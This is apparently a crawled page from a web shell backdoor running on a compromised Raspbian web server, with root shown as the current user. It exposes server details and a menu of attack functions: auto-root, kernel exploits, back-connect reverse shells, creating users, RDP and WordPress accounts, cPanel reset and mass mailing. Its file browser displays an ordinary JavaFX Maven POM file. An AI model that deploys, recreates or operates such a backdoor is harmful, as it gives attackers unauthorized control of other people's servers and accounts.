Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
maven-repo /
org /
openjfx /
javafx /
11 /
[ HOME SHELL ]
Name
Size
Permission
Action
javafx-11.pom
1.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : javafx-11.pom
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>org.openjfx</groupId> <artifactId>javafx</artifactId> <version>11</version> <packaging>pom</packaging> <name>openjfx</name> <description>OpenJFX JavaFX</description> <properties> <javafx.version>11</javafx.version> <debian.originalVersion>11</debian.originalVersion> <debian.package>libopenjfx-java</debian.package> </properties> <dependencyManagement> </dependencyManagement> <profiles> <profile> <id>linux</id> <activation> <os> <name>linux</name> </os> </activation> <properties> <javafx.platform>linux</javafx.platform> </properties> </profile> <profile> <id>macosx</id> <activation> <os> <name>mac os x</name> </os> </activation> <properties> <javafx.platform>mac</javafx.platform> </properties> </profile> <profile> <id>windows</id> <activation> <os> <family>windows</family> </os> </activation> <properties> <javafx.platform>win</javafx.platform> </properties> </profile> <profile> <id>javafx.platform.custom</id> <activation> <property> <name>javafx.platform</name> </property> </activation> <properties> <javafx.platform>${javafx.platform}</javafx.platform> </properties> </profile> </profiles> </project>
Close